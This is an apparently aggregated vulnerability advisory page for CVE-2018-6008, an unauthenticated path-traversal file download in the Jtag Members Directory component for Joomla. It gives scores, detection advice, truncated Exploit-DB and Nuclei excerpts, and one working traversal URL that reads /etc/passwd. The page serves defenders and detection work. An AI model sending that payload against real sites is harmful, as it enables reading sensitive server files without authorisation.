CVE-2018-6008
Published 2018-01-29

CVE-2018-6008: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter.

Priority: P2 · 66 · high · CVSS 3.0: 7.5
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:N / A:N
Exploit available
EPSS: 37.40% (98.3rd percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlatag | jtag_members_directory | — | — |
Detection & IOCs (extracted from sources)

URL: /index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd

- Detect LFI exploitation attempts targeting the Jtag Members Directory component by matching the Joomla component option and task parameters in HTTP GET requests.
- Alert on HTTP 200 responses to requests containing 'com_jtagmembersdirectory' and 'download_file' with path traversal sequences, especially when the response body matches the pattern 'root:.*:0:0:', indicating /etc/passwd disclosure.
- The vulnerability is exploited via the 'download_file' parameter in the Jtag Members Directory component (com_jtagmembersdirectory). The attacker-controlled parameter is passed directly without sanitization, enabling path traversal to arbitrary files.
- The exploit requires no authentication (PR:N, UI:N per CVSS), so any unauthenticated remote attacker can trigger the file download.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | 2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
No detection rules found.
Exploit-DB
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
exploitdb · 2018-01-28 · CVSS 7.5 (HIGH)
---
# # # # #
# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: https://joomlatag.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
# Version: 5.3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6008
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to download arbitrary files.
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE
Nuclei
Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
nuclei · CVSS 7.5 (HIGH)
Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
Template:

```yaml
id: CVE-2018-6008

info:
  name: Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system.
  remediation: |
    Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/e
```
References

- https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
- https://www.exploit-db.com/exploits/43913/